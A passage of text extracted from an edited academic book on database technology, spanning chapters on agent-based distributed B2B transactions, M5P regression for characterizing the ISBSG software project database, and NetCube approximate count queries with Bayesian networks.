of records. The SQL script required to achieve record locking is propagated in a linear fashion to each participant using Oracle 9i’s Database Link mechanism. When the last participant in the transaction achieves its record lock, the script issues a commit and the DTC performs the twophase commit. Figure 4 depicts the test scenario for the linear progressive simulation. This test implementation of the mobile/intelligent agent framework simulates the same distributed transaction previously accomplished by the linear progressive method. In the test implementation, the IA communicates with the enterprise application using Sun Microsystem’s Javaspace technology, a core component of Jini 2.0. The Javaspace is a Linda-like4 (Freeman, Hupfer, & Arnold, 1999) shared distributed memory that provides a synchronized message facility for this framework implementation. The Javaspace also provides an implementation of the Jini distributed events model that aids with synchronization of the message passing. The Javaspace can be used to implement a mobile-agent-based messaging requirement. A typical distributed transaction in this implementation of the framework would flow as follows (a more business level algorithmic description is provided in Appendix A): The Javaspace MA signals that the IA is ready to fulfill.
1.
Figure 4. Simulation of the linear progressive methods for distributed B2B transactions SQL Script
1
5 2
DB 1
DB 2
3
DB 3
4
DB 4
DB 5
1995
A Parallel Methodology for Reduction of Coupling
2.
3.
4.
5.
6.
7.
8.
Upon receiving a fulfill message from all MAs the IA writes one entry into the Javaspace for each trading partner interaction. These entries represent the fulfill/acknowledge message. The Javaspace MA signals each enterprise application via Jini’s distributed event mechanism. After completion of the record locking and the prepare phase of the XOPEN two-phase commit, each enterprise application writes its entry into the Javaspace. This entry represents the acknowledge message of the two-phase commit protocol. The Javaspace MA signals the IA via Jini’s distributed event mechanism. The Javaspace signals once for each business interaction The IA waits to receive an acknowledge signal from each business partner participating in the distributed transaction. If the IA receives all acknowledgments within a specified time limit, the IA writes the commit entry to the Javaspace. The Javaspace MA signals each enterprise application via Jini’s distributed event mechanism. Each enterprise application commits and releases its respective record locks.
As discussed earlier, in the test implementation the Javaspace and Jini’s distributed events combine to perform the messaging requirement of an MA in the mobile/intelligent agent framework. Testing our hypothesis required measuring the lock time required by the linear progressive transaction method and comparing this to the lock time required by the mobile/intelligent agent framework transaction. In our test, we sampled 50 distributed transactions using each method. Each distributed transaction consisted of five trading partner interactions. The trading partner interaction required the locking of a single record on the Oracle 9i database that provided storage for the enterprise applications. Using Oracle’s LogMiner
1996
Utility, we were able to recover the amount of time in seconds each record was locked on the five Oracle 9i databases from the active redo log files. The total lock time for the distributed transaction was the sum of the five partner interactions. The 50 distributed transactions were averaged to compute a mean for each method. To simulate both methods there were a total of six test machines, with one machine used to initiate the transaction, while the other five machines were running Oracle 9i. Each machine was running Windows 2000 Professional edition. Each of the test machines was a Pentium 4, with 512 megabytes of random access memory (RAM), running at 2.0 gigahertz. Table 2 shows a typical measurement for the distributed transaction using the linear progressive (Linear P) method and the mobile/intelligent agent framework (Mobile A). A two-sample t-test was used to compare the rating of the two sample means (the linear progressive transaction and the parallel MA). This tested the following hypothesis. Hypothesis •
•
H0 : ρ = 0 (Null hypothesis) There is no significant difference between the linear progressive transaction and the mobile/intelligent agent framework transaction. H1: ρ ≠ 0 (Alternative hypothesis) There is a significant difference between the linear progressive transaction and the mobile/intelligent agent framework transaction.
The two-sample t-test was used to indicate if there is a significant difference (at a 95% confi-
Table 2. Record lock time measurements Method
DB1
DB2
DB3
DB4
DB5
Linear P
6
5
5
4
3
Mobile A
3
3
4
3
3
A Parallel Methodology for Reduction of Coupling
Table 3. MINITAB two-sample t-test for linear progressive method versus mobile/intelligent agent Two-sample T for linear progressive vs. Mobile/ Intelligent Agent
Linear P Mobile A
N
Mean
StDev
SE Mean
50
23.64
3.30
0.47
50
15.40
1.03
0.15
dence level) between the two sample means. When the means test indicates there is no significant difference between the linear progressive transaction and the mobile/intelligent agent framework transaction, this means that, on average, neither of the two transaction methods are different, subject to the confidence level of the test. When a test has a 95% confidence level, it means that if there were 100 comparisons between the linear progressive transaction and the mobile/intelligent agent framework transaction, there would be no significant difference in 95 out of the 100 comparisons. The two-sample t-test was run with MINITAB statistical software. Table 3 shows the MINITAB output for the two-sample t-test . The sample mean for the linear progressive (Linear P) and the mobile/intelligent agent (Mobile A) is 23.64 s and 15.40 s respectively. Subtracting the sample means yields an estimate of the difference of sample means of 8.240. The MINITAB output also shows that we are running the t-test with difference = 0, meaning that there is no significant difference between sample means (null hypothesis) versus the (alternative hypothesis) there is a significant difference between the sample means. The computed t-value of 16.86 with 58 df shows that there is less than .001 probability (p-value) that the population means are equal. Therefore, we must reject the null hypothesis, that the sample means are equal
at a level of signficance of .05% and accept the alternative hypothesis that there is a significant difference in the population means. Using a confidence interval (CI) to estimate the difference of the population means given these samples, the MINITAB output shows a 95% CI on the difference of 7.261 and 9.219. This CI states there is a probability of .95 that the difference between the means will be between 7.261 and 9.219. The CI agrees with our rejection of the null hypothesis that there is no significant difference between the sample means, therefore we accept the alternative that there is a significant difference in the population means. To note that the difference between means is significantly different from 0, μ1-μ2≠0, the 95% CI of (7.261, 9.219) does not contain 0, therefore the difference of the means is significantly different from 0.
DISCUSSION These results show that there is a significant difference between the linear progressive method and the mobile/intelligent agent framework method. Estimating the time saved to be 7.261, the lower end of the CI, suggests that in the worse case an average savings of 30% on the record locking time was achieved by our framework, compared to the linear progressive method The best case average saving shown by this test using the upper end of the CI, 9.219, suggests that a saving of 60% is possible under the tested scenario. However, one assumption of the test scenario for the linear progressive method was that all individual business interactions are fully specified by the front-end logistics application before any business interaction takes place. However, if the front-end application approaches each interaction one at a time, meaning the user specifies interaction 1, and the records are locked on vendor 1’s system, then interaction 2 is specified by the user and records are locked on vendor 2’s system and so on, the worse case and best case average saving
1997
A Parallel Methodology for Reduction of Coupling
would increase in proportion to the time it takes to specify all interactions other than the first.
CONCLUSION In summary, our research shows that retaining ACID properties in transactions is possible in a distributed B2B scenario by employing a method that greatly reduces record lock time. The recordlock test conducted with our framework proved to be a significant improvement over the traditional linear approach to distributed transactions. In the worst case, a 30% improvement was shown; in the best case, the improvement could be as much as 60%. The noted improvement is a result of the framework’s use of MAs working in parallel to accommodate individual trading partner interactions. Our mobile/intelligent agent framework makes use of ebXML’s CPA in order to allow MAs to autonomously negotiate individual business interactions. As agents complete the negotiation, each agent signals the IA, which is standing by, ready to fulfill the intended transaction with its trading partner. When all MAs have signaled they are ready to fulfill the transaction, the IA starts a standard two-phase commit. One benefit of our framework is that it reuses existing infrastructure such as databases that are capable of the two-phase commit. Therefore, companies would not need to implement a new distributed transaction protocol such as provided in the ebXML standard. In our implementation of the framework, this reuse is seen in the XOPEN distributed two-phase commit feature in the Oracle database. A secondary benefit attributed to the use of MAs and IAs in our framework is the ability to have a late binding to the atomicity property of the transaction. This is similar to ebXML’s ability to do a partial transaction with respect to the originating request. Therefore, the framework is capable of saving partial work that has been accomplished towards the goals of the transaction.
1998
Our current experiment was chosen so that the improvement would be the least possible improvement in record locking from using our methodology—our expectation would be that a typical operation in practice, as well as any other experiments using our methodology, would actually achieve better results than was possible in our chosen experiment. However, we would be interested to see further experiments by other researchers validating our results. Although the mobile/intelligent agent framework has shown significant results in these test scenarios, future research will concentrate on the advanced transaction models. Our research suggests that it is possible to reduce record locking without compromising the ACID properties. However, in the cases where extended record locks would not be allowed from a business prospective, we suggest setting an isolation level for these transactions as a possible alternative. Isolation levels are a standard part of an SQL transaction that allow different levels of read access to records that are currently locked. In order to accommodate the use of isolation levels in these transactions there are two options: first, we should consider the static binding that is achievable if we modify the CPA to allow the addition of an isolation level property as part of its specification. A second method for achieving dynamic isolation levels would be to allow this property to be incorporated as a Web service to be negotiated during the appropriate phase of the business transaction.
REFERENCES American National Standards Institute. (1992). American national standards for information systems-database language- SQL. ANSI X3.1351992. Washington, D.C.: U.S. Government Printing Office.
A Parallel Methodology for Reduction of Coupling
Ariba Inc. (2006). cXML version 1.0 specification. Retrieved December 1, 2006, from http://www. cxml.org Attaluri, G., & Salem, K. (2002). The presumedether two-phase commit protocol. IEEE Transactions on Knowledge and Data Engineering, 14(5), 1190-1196. Dan, A., Dias, D., Kearny, R., Lau, T., Nguyen, R., Parr, F., et al. (2001). Business-to-business intergration with tpaML and a business-to-business protocol framework. IBM Systems Journal, 40(1), 68-90. Freeman, E., Hupfer, S., & Arnold, K. (1999). Javaspaces principles: Patterns and practice. Reading, MA: Addison-Wesley. Organization for the Advancement of Structured Information Standards (OASIS). (2002a). Business transaction protocol primer [Version 1.0]. Billerica, MA: Author.
Organization for the Advancement of Structured Information Standards (OASIS). (2002b). Business transaction protocol [Version 1.03]. Billerica, MA: Author. Riccardi, G. (2001). Principles of database systems with Internet and Java applications. Reading, MA: Addison-Wesley. Weigand, H., Heuvel, W. J., & Dignum, F. (1998). Modeling electronic commerce transactions: A layered approach. In Proceedings from LPCM ’98: Third International Workshop on the Language/Action Perspective on Communication Modeling (pp. 47-58). Weigand, H., Verharen, E. M., & Dignum, F. (1997). Dynamic business models as a basis for interoperable transaction design. Information Systems, 22(2,3), 139-154. Wooldridge, M. J., & Jennings, N. R. (1995). Intelligent agents: Theory and practice. Knowledge Engineering Review, 10(2), 115-152.
This work was previously published in Journal of Electronic Commerce in Organizations, Vol. 5, Issue 3, edited by M. Khosrow-Pour, pp. 52-67, copyright 2007 by IGI Publishing (an imprint of IGI Global).
1999
2000
Chapter 6.7
A Two-Stage Zone Regression Method for Global Characterization of a Project Database J. J. Dolado University of the Basque Country, Spain D. Rodríguez University of Reading, UK J. Riquelme University of Seville, Spain F. Ferrer-Troyano University of Seville, Spain J. J. Cuadrado University of Alcalá de Henares, Spain
ABSTRACT One of the problems found in generic project databases, where the data is collected from different organizations, is the large disparity of its instances. In this chapter, we characterize the database selecting both attributes and instances so that project managers can have a better global vision of the data they manage. To achieve that,
we first make use of data mining algorithms to create clusters. From each cluster, instances are selected to obtain a final subset of the database. The result of the process is a smaller database which maintains the prediction capability and has a lower number of instances and attributes than the original, yet allow us to produce better predictions.
A Two-Stage Zone Regression Method for Global Characterization of a Project Database
INTRODUCTION Successful software engineering projects need to estimate and make use of past data since the inception of the project. In the last decade, several organizations have started to collect data so that companies without historical datasets can use these generic databases for estimation. In some cases, project databases are used to compare data from the organization with other industries, that is, benchmarking. Examples of such organizations collecting data include the International Software Benchmarking Standards Group (ISBSG, 2005) and the Software Technology Transfer Finland (STTF, 2004). One problem faced by project managers when using these datasets is that the large number of attributes and instances needs to be carefully selected before estimation or benchmarking in a specific organization. For example, the latest release of the ISBSG (2005) has more than 50 attributes and 3,000 instances collected from a large variety of organizations. The project manager has the problem of interpreting and selecting the most adequate instances. In this chapter, we propose an approach to reduce (characterize) such repositories using data mining as shown in Figure 1. The number of attributes is reduced mainly using expert knowledge although the data mining
Figure 1. Characterizing dataset for producing better estimates
A1
A2
An
… a1m
amn
Reduced dataset, it ess attributes and instances
algorithms can help us to identify the most relevant attributes in relation to the output parameter, that is, the attribute that wants to be estimated (e.g., work effort). The number of instances or samples in the dataset is reduced by selecting those that contribute to a better accuracy of the estimates after applying a version of the M5 (Quinlan, 1992) algorithm, called M5P, implemented in the Weka toolkit (Witten & Frank, 1999) to four datasets generated from the ISBSG repository. We compare the outputs before and after, characterizing the database using two algorithms provided by Weka, multivariate linear regression (MLR), and least median squares (LMS). This chapter is organized as follows: the Techniques Applied section presents the data mining algorithm; The Datasets section describes the datasets used; and the Evaluation of the Techniques and Characterization of Software Engineering Datasets section discusses the approach to characterize the database followed by an evaluation of the results. Finally, the Conclusions section ends the chapter.
TECHNIQUES APPLIED Many software engineering problems like cost estimation and forecasting can be viewed as classification problems. A classifier resembles a function in the sense that it attaches a value (or a range or a description), named the class, C, to a set of attribute values A1, A2,... An, that is, a classification function will assign a class to a set of descriptions based on the characteristics of the instances for each attribute. For example, as shown in Table 1, given the attributes size, complexity, and so forth, a classifier can be used to predict the effort. In this chapter, we have applied data mining, that is, computational techniques and tools designed to support the extraction, in an automatic way, of the information useful for decision support or exploration of the data source (Fayyad,
2001
A Two-Stage Zone Regression Method for Global Characterization of a Project Database
Table 1. Example of attributes and class in software engineering repository A1 -Size
…
An- Complexity
C - Effort
a11
…
a11
c1
…
…
…
…
a11
…
anm
cn
Piatetsky-Shapiro, & Smyth, 1996). Since data may not be organized in a way that facilitates the extraction of useful information, typical data mining processes are composed of the following steps: •
•
•
•
Data Preparation: The data is formatted in a way that tools can manipulate it, merged from different databases, and so forth. Data Mining: It is in this step when the automated extraction of knowledge from the data is carried out. Examples of such algorithms and some usual representations include: C4.5 or M5 for decision trees, regression, and so forth. Proper Interpretation of the Results: Including the use of visualization techniques. Assimilation of the Results.
Within the available data mining algorithms, we have used M5 and linear regression classifiers implemented in the Weka toolkit, which have been used to select instances of a software engineering repository. The next sub-sections explain these techniques in more detail.
M5 and M5P The main problem in linear regression is that the attributes must be numeric so that the model obtained will also be numeric (simple equations in a dimensions). As a solution to this problem, deci-
2002
sion trees have been used in data mining for a long time as a supervised learning technique (models are learned from data). A decision tree divides the attribute space into clusters with two main advantages. First, each cluster is clearly defined in the sense that new instances are easily assigned to a cluster (leaf of the tree). The second benefit is that the trees are easily understandable by users in general and by project managers in particular. Each branch of the tree has a condition which reads as follows: attribute ≤ value or attribute > value that serve to make selections until a leaf is reached. Such conditions are frequently used by experts in all sciences in decision making. Decision trees are divided into model trees in which each leaf represents the average value of the instances that are covered by the leaf and regression trees in which each leaf is a regression model. Examples of decision trees include a system called CART (Classification and Regression Trees) developed by Breiman (1984), ID3 (Quinlan, 1986) improved into C4.5 (Quinlan, 1993), and M5 (Quinlan, 1992) with the difference that in M5 the nodes represent linear regressions rather than discrete classes. The M5 algorithm, the most commonly used classifier of this family, builds regression trees whose leaves are composed of multivariate linear models, and the nodes of the tree are chosen over the attribute that maximizes the expected error reduction as a function of the standard deviation of output parameter. In this work, we have used the M5 algorithm implemented in the Weka toolkit (Witten & Frank, 1999), called M5P. Figure 2 shows Weka’s output for the M5P algorithm for one of the datasets that we used for this chapter. In this case, the M5P algorithm created 17 clusters, from LM1 to LM17. The normalized work effort (NormWorkEff ) is the dependent variable, and a different linear model is applied depending on the number of Function Points (FP) and productivity (NormPDR). The clusters found can assign to the dependent variable either a constant or a linear equation (in the majority of the cases); in this case,
A Two-Stage Zone Regression Method for Global Characterization of a Project Database
each cluster or region is associated with linear equations (Figure 2, right column) In the example shown in Figure 2, the M5P algorithm created 17 leaves, and we will use FP and NormPDR to select the appropriate linear model. In this case, the tree generated is composed of a large number of leaves divided by the same variables at different levels. The tree could be simplified adding a restriction about the minimum number of instances covered by each leaf; for example, saying that there should be 100 instances per leaf will generate a simpler tree but less accurate.
Figure 3 also shows the tree in a graphical way. Each leaf of the tree provides further information within brackets. For example, for LM1, there are 308 instances and an approximate error in that leaf is 8.331%.
Constructing the M5 Decision Tree Regarding the construction of the tree, M5 needs three steps. The first step generates a regression tree using the training data. It calculates a linear model (using linear regression) for each node
2003
A Two-Stage Zone Regression Method for Global Characterization of a Project Database
of the tree generated. The second step tries to simplify the regression tree generated in the previous search (first post-pruning) deleting the nodes of the linear models whose attributes do not increase the error. The aim of the third step is to reduce the size of the tree without reducing the accuracy (second post-pruning). To increase the efficiency, M5 does the last two steps at the same time so that the tree is parsed only once. This simplifies both the number of the nodes as well as simplifying the nodes themselves. As mentioned previously, M5 first calculates a regression tree that minimizes the variation of the values in the instances that fall into the leaves of the tree. Afterwards, it generates a lineal model for each of the nodes of the tree. In the next step, it simplifies the linear models of each node by deleting those attributes that do not reduce the classification error when they are eliminated. Finally, it simplifies the regression tree by eliminating subtrees under the intermediate nodes. They are the nodes whose classification error is greater than the classification error given by the lineal model corresponding to those intermediate nodes. In this way, taking a set of learning instances E and a set of attributes A, a simplified version of the M5 algorithm will be as follows: Proc_M5 (E,A) begin R : = create-node-tree-regression R : = create-tree-regression (E,A,R) R : = simplify-lineal-models (E,R) R : = simplify-regression-tree (E,R) Return R End
The regression tree, R, is created in a divide-and-conquer method; the three functions (create-tree-regression, simplify-lineal-models and simplify-regression-tree) are called in a recursive way after creating regression tree node by (createnode-tree-regression). Once the tree has been built, a linear model for
2004
each node is calculated and the leaves of the trees are pruned if the error decreases. The error for each node is the average of the difference between the predicted value and the actual value of each instance of the training set that reaches the node. This difference is calculated in absolute terms. This error is weighted according to the number of instances that reach that node. This process is repeated until all the examples are covered by one or more rules.
Transformation of Nominal Attributes Before building the tree, all non-numeric attributes are transformed into binary variables so that they can be treated as numeric attributes. A variable with k values is transformed into k-1 binary variables. This transformation is based on the Breiman observation. According to this observation, the best splitting in a node for a variable with k values is one of the k-1 possible solutions once the attributes have been sorted.
Missing Values A quite common problem with real datasets occurs when the value of a splitting attribute does not exist. Once the attribute is selected as a splitting variable to divide the dataset into subsets, the value of this attribute must be known. To solve this problem, the attribute whose value does not exist is replaced by the value of another attribute that is correlated to it. A simpler solution is to use the prediction value as the value of the attribute selected or the average value of the attribute for all the instances in the set that do not reach the node, but can be used as the value of the attribute.
Heuristics The split criterion of the branches in the tree in M5 is given by the heuristic used to select the best attribute in each new branch. For this task, M5 uses the standard deviation as a measure of the error
A Two-Stage Zone Regression Method for Global Characterization of a Project Database
in each node. First, the error decrease for each attribute used as splitting point is calculated.
Smoothing In the final stage, a regularization process is made to compensate discontinuities among adjacent linear models in the leaves of the tree. This process is started once the tree has been pruned and especially for models based on training sets containing a small number of instances. This smoothing process usually improves the prediction obtained.
Linear Regression and Least Median Squares Linear regression (LR) is the classical linear regression model. It is assumed that there is a linear relationship between a dependant variable (e.g., effort) with a set of or independent variables, that is, attributes (e.g., size in function points, team size, development platform, etc.). The aim is to adjust the data to a model so that
THE DATASETS The International Software Benchmarking Standards Group (ISBSG), a non-profit organization, maintains a software project management repository from a variety of organizations. The ISBSG checks the validity and provides benchmarking information to companies submitting data to the repository. Furthermore, it seems that the data is collected from large and successful organizations. In general, such organizations have mature processes and well-established data collection procedures. In this work, we have used the “ISBSG release no. 8”, which contains 2,028 projects and more than 55 attributes per project. The attributes can be classified as follows: • • •
• y = β0 + β1 x1 + β2 x2 + ... + + βk xk + e. Least median squares (LMS) is a robust regression technique that includes outlier detection (Rousseeuw & Leroy, 1987) by minimizing the median rather than the mean. Goodness of fit of the linear models is usually measured by the correlation, co-efficient of multiple determination R2 and by the mean squared error. However, in the software engineering domain, the mean magnitude of relative error (MMRE) and prediction at level l—Pred (l)—are well known techniques for evaluating the goodness of fit in the estimation methods (see the Evaluation of the Techniques and Characterization of Software Engineering Datasets section).
•
Project context, such as type of organization, business area, and type of development; Product characteristics, such as application type user base; Development characteristics, such as development platform, languages, tools, and so forth; Project size data, which is different types of function points, such as IFPUG (2001), COSMIC (2004), and so forth; and Qualitative factors such as experience, use of methodologies, and so forth.
Before using the dataset, there are a number of issues to be taken into consideration. An important attribute is the quality rating given by the ISBSG: its range varies from A (where the submission satisfies all criteria for seemingly sound data) to D (where the data has some fundamental shortcomings). According to ISBSG, only projects classified as A or B should be used for statistical analysis. Also, many attributes in ISGSB are categorical attributes or multi-class attributes that need to be pre-processed for this work (e.g., the
2005
A Two-Stage Zone Regression Method for Global Characterization of a Project Database
project scope attribute which indicates what tasks were included in the project work effort—planning, specification, design, build, and test—were grouped. Another problem of some attributes is the large number of missing instances. Therefore, in all datasets with the exception of the “reality dataset”, we have had to do some pre-processing. We selected some attributes and instances manually. There are quite a large number of variables in the original dataset that we did not consider relevant or they had too many missing values to be considered in the data mining process. From the original database, we only considered the IFPUG estimation technique and those that can be considered very close variations of IFPUG such as NESMA. We have used four datasets selecting different attributes including the one provided in the “reality tool” by ISBSG. In our study, we have selected NormalisedWorkEffort or SummaryWorkEffort as dependent variables. The normalized work effort is an estimate of the full development life cycle effort for those projects covering less than a full development life cycle while the summary work effort is the actual work effort carried out by the project. For projects covering the full development life cycle and projects where the development life cycle coverage is not known, these values are the same, that is, work effort reported. When the variable summary work effort is used, the dataset included whether each of the life cycle phases were carried out, such as, planning, specification, building and testing. DS1: The reality dataset is composed of 709 instances and 6 attributes (DevelopmentType, DevelopmentPlatform, LanguageType, ProjectElapsedTime, NormalisedWorkEffort, UnadjustedFunctionPoints). The dependent variable for this dataset is the NormalisedWorkEffort. DS2: The dataset DS2 is composed of 1,390 instances and 15 attributes (FP, VAF, MaxTeamSize, DevType, DevPlatf, LangType,
2006
DBMUsed, MethodUsed, ProjElapTime, ProjInactiveTime, PackageCustomisation, RatioWEProNonPro, TotalDefectsDelivered, NormWorkEff, NormPDR). The dependent variable for this dataset is the NormalisedWorkEffort. DS3. The dataset DS3 is composed of 1,390 instances and 19 attributes (FP, SummWorkEffort, MaxTeamSize, DevType, DevPlatf, LangType, DBM Used, MethodUsed, ProjElapTime, ProjInactiveTime, PackageCustomisation, Planning, Specification, Build, Test, Impl, RatioWEProNonPro, TotalDefectsDelivered, ReportedPDRAdj). In this case, we did consider the software life cycle attributes (Planning, Specification, Build, Impl, Test), and, therefore, we were able to use the summary work effort (SummWorkEffort) as the dependent variable. DS4. The dataset DS4 is very similar to DS3 but it uses the unadjusted function points (UnadjFP) and the value adjustment factor (VAF) instead of the adjusted function points (FP). It is also composed of 1,390 instances. The 20 attributes are VAF, SummWorkEffort, MaxTeamSize, DevType, DevPlatf, LangType, DBMUsed, MethodUsed, ProjElapTime, ProjInactiveTime, PackageCustomisation, Planning, Specification, Build, Test, Impl, RatioWEProNonPro, TotalDefectsDelivered, UnadjFP, and ReportedPDRAdj. It also uses the summary work effort (SummWorkEffort) as the dependent variable.
EVALUATION OF THE TECHNIQUES AND CHARACTERIZATION OF SOFTWARE ENGINEERING DATASETS We compare the benefits of the techniques by using linear regression and the least median square as prediction techniques before and after
A Two-Stage Zone Regression Method for Global Characterization of a Project Database
characterizing the database using the classical mean magnitude of relative error (MMRE) and Pred(%). In software engineering, the standard criteria for a model to be acceptable are Pred(25) ≥ 0.75 and MMRE ≤ 0.25. •
MMRE is computed as
1 n ei − êi ⋅∑ n i =1 ei
•
where in a sample of size n, êi is the estimated value for the i-th element, and ei is the actual value. Pred(%) is defined as the number of cases whose estimations are under the %, divided by the total number of cases. For example, Pred(25)=0.75 means that 75% of cases estimates are within the inside 25% of its actual value.
NormalisedWorkEffort is the dependent variable and a different linear model is applied depending on the UnadjustedFunctionPoints variable. The clusters found can assign to the dependent variable either a constant or a linear equation (in most cases). For example, for the reality dataset, M5P has produced only two branches that are interpreted as follows: if UnadjustedFunctionPoints is less than 343 then we apply LM1 to calculate the NormalisedWorkEffort (see Figure 4). The categorical data of the linear regression function obtained by Weka is calculated substituting the value for the appropriate value wherever it occurs. For example, if we had an instance with DevelopmentPlatform equals to MF, LanguageType equals to ApG and UnadjustedFunctionPoints less than 343 then the linear equation to apply would look like this: LM num: 1 NormalisedWorkEffort =
We will now explain how we proceeded using the reality dataset as it is the smallest of the four datasets used. Once we had our datasets ready, we applied the M5P algorithm using the Weka Toolkit. The M5P algorithm created two clusters, LM1 and LM2 (the other three datasets created a much larger number of clusters). The
A Two-Stage Zone Regression Method for Global Characterization of a Project Database
For evaluating each categorical expression, if the value of the category on the left hand side is equal to any of the categories on the right hand side of the equation, then we substitute the entire equation with value 1; otherwise with the value 0. Following the example, we obtain: LM num: 1 NormalisedWorkEffort = 90.5723 * 1, MR + 63.5148 * 1 + 628.9547 * 0 + 184.9949 * ProjectElapsedTime + 10.9211 * UnadjustedFunctionPoints - 545.8004
From each cluster only those instances that were within the 25% of the actual value, that is, Pred (25), are selected to be part of the characterized database. Afterwards, we applied LR and LSM in all datasets before and after selecting instances. In the case of the reality dataset, the number of instances was reduced from 709 to 139 projects. We also created another dataset by selecting 139 instances randomly from the entire dataset (709 instances). Table 2 compares the MMRE, Pred(25), and Pred(30) results for the reality dataset where the columns named Before are the results obtained using the entire dataset; After columns are the results when applying LR and LSM with only the selected instances. Finally, Random columns are the result when we randomly selected a number of instances equal to the number of instances of the characterized dataset (139 in the case of the reality dataset). For the reality dataset, M5P allowed us to reduce the number of instances in the dataset from 709 to 139 (570 instances). Table 3 shows the result for the DS2 dataset. M5P allowed us to reduce the number of instances in the dataset from 1,390 to 1,012 (378 instances).
2008
Table 4 shows the results for the DS3 dataset, and the number of instance was reduced by 375. Table 5 shows the results for the DS4 dataset. In this case, the number of instances is reduced by 411. Although the general estimation accuracy of LMS and LR in the datasets used is quite low using the software engineering criteria, their performance is always improved when selecting a fewer number of instances using M5P. Table 6 shows the differences before and after selecting the instances. It is worth noting that the best improvement is in the case where the difference in the number of instances is large. This seems to be quite logical as the larger the number of instances discarded by the data mining algorithm, the cleaner the dataset should be.
CONCLUSION In this chapter, we characterized 4 datasets created from the ISBSG database selecting both attributes and instances so that project managers can have a better global vision of the data they manage. To achieve this, we first created several subsets of the ISBSG database using expert knowledge to select attributes. We then made use of Weka’s M5P data mining algorithm to create clusters. From these clusters, only those instances that were within the 25% of the actual value are selected to be part of the estimation model. When we compared the goodness of using linear regression and the least median square as prediction techniques using the mean magnitude of relative error (MMRE) and Pred(%), the smaller dataset produces better or as least similar results. The result is a new database which represents the original database but with fewer number of attributes and instances so that the project manager can get a much better grasp of the information of the database, improving the performance of the rest of activities.
A Two-Stage Zone Regression Method for Global Characterization of a Project Database
Further work will consist of using data mining techniques for characterizing not only the instances but also the attributes (in this work, the attributes were selected manually using expert knowledge), by using bi-clustering. More needs to be done for understanding and comparing different clusterization techniques to create segmented models and analyzing its usefulness for project managers.
ACKNOWLEDGMENT This research was supported by the Spanish Research Agency (CICYT TIN2004-06689-C03).
IFPUG. (2001). Function point counting practices, release 4.1.1. Manual. International Function Point Users Group. ISBSG. (2005). International Software Benchmarking Standards Group (ISBSG). Retrieved from http://www.isbsg.org/ Quinlan, J. R. (1986). Induction of decision trees. Machine Learning, 1, 81-106. Quinlan, J. R. (1992). Learning with continuous classes. In the Proceedings of the 5th Australian Joint Conference on Artificial Intelligence, Hobart, Tasmania, November 16-18 (pp. 343-348). Singapore: World Scientific Press. Quinlan, J. R. (1993). C4.5: Programs for machine learning. San Mateo, CA: Morgan Kaufmann.
REFERENCES Breiman, L. (1984). Classification and regression trees. New York: Chapman & Hall/CRC. COSMIC. (2004). COSMIC-FFP measurement manual, version 2.1. Common Software Measurement International Consortium. Fayyad, U., Piatetsky-Shapiro, G., & Smyth, P. (1996). The KDD process for extracting useful knowledge from volumes of data. Communications of the ACM, 39, 27-34.
Rousseeuw, P. J., & Leroy, A. M. (1987). Robust regression and outlier detection. New York: Wiley. STTF. (2004). Software Technology Transfer Finland (STTF). Retrieved from http://www.sttf. fi/eng/indexEnglish.htm Witten, I. H., & Frank, E. (1999). Data mining: Practical machine learning tools and techniques with Java implementations. San Francisco, CA: Morgan Kaufmann.
This work was previously published in Advances in Machine Learning Applications in Software Engineering, edited by D. Zhang and J. Tsai, pp. 1-13, copyright 2007 by IGI Publishing (an imprint of IGI Global).
2009
Section VII
Critical Issues
This section addresses conceptual and theoretical issues related to the field of database technology, which include security issues in numerous facets of the discipline including security within medical and web-powered. Within these chapters, the reader is presented with analysis of the most current and relevant conceptual inquires within this growing field of study. Particular chapters also address quality of service issues in information quality, data cleaning, and data classification. Overall, contributions within this section ask unique, often theoretical questions related to the study of database technology and, more often than not, conclude that solutions are both numerous and contradictory.
2011
Chapter 7.1
NetCube:
Fast, Approximate Database Queries Using Bayesian Networks Dimitris Margaritis Iowa State University, USA Christos Faloutsos Carnegie Mellon University, USA Sebastian Thrun Stanford University, USA
ABSTRACT We present a novel method for answering count queries from a large database approximately and quickly. Our method implements an approximate DataCube of the application domain, which can be used to answer any conjunctive count query that can be formed by the user. The DataCube is a conceptual device that in principle stores the number of matching records for all possible such queries. However, because its size and generation time are inherently exponential, our approach uses one or more Bayesian networks to implement it approximately. Bayesian networks are statistical graphical models that can succinctly represent the underlying joint probability distribution of
the domain, and can therefore be used to calculate approximate counts for any conjunctive query combination of attribute values and “don’t cares.” The structure and parameters of these networks are learned from the database in a preprocessing stage. By means of such a network, the proposed method, called NetCube, exploits correlations and independencies among attributes to answer a count query quickly without accessing the database. Our preprocessing algorithm scales linearly on the size of the database, and is thus scalable; it is also parallelizable with a straightforward parallel implementation. We give an algorithm for estimating the count result of arbitrary queries that is fast (constant) on the database size. Our experimental results show that NetCubes
have fast generation and use, achieve excellent compression and have low reconstruction error. Moreover, they naturally allow for visualization and data mining, at no extra cost.
INTRODUCTION In this chapter we will focus on the problem of estimating the result of a count query on a very large database, fast. The problem of computing counts of records from a database with given desired characteristics is a common one in the area of decision support systems, online analytical processing (OLAP), and data mining. A typical scenario is as follows: a customer analyst has access to a database of customer transaction information (e.g., customer A bought items B, C, and D at the store at location X), and is interested in discovering patterns that exhibit an interesting or unusual behavior that might lead to possibly profitable insights into the company’s customer behavior. In other words, the company wants to be able to create a model of its customer base (possibly partial), and the better it is able to do that, the more insights it can obtain from the model and more profitable it has the opportunity to be. In this example scenario an analyst would, through an interactive query process, request count information from the database, possibly drilling down in interesting subsets of the database of customer information. It is very important that the results to these queries be returned quickly, because that will greatly facilitate the process of discovery by the analyst. It is also important that the answers to these queries are accurate up to a reasonable degree, although it is not imperative that they are exact. The analyst wants an approximate figure of the result of the query and getting it correct down to the last digit is not necessary. The methods presented in this chapter are motivated by these observations, that is, the fact that we need great speed coupled with only reasonable accuracy. In the following we present NetCube, a method that can support fast, approximate 2012
queries on very large databases. NetCube can fit approximately a database of billions of records in the main memory of a single workstation. There is no “trick” to this—it is due to the fact that what is stored in memory is not the actual data themselves, but only a model of the data. This model is a Bayesian network (BN), which can be used to answer count queries quickly, albeit only approximately. The speed comes from the fact that only the Bayesian network is used to answer the query, and the database is not accessed at query time. The database is accessed only during the one-time preprocessing phase, when a number of BN models are constructed from it. There are two important considerations relevant to the problem described above: •
•
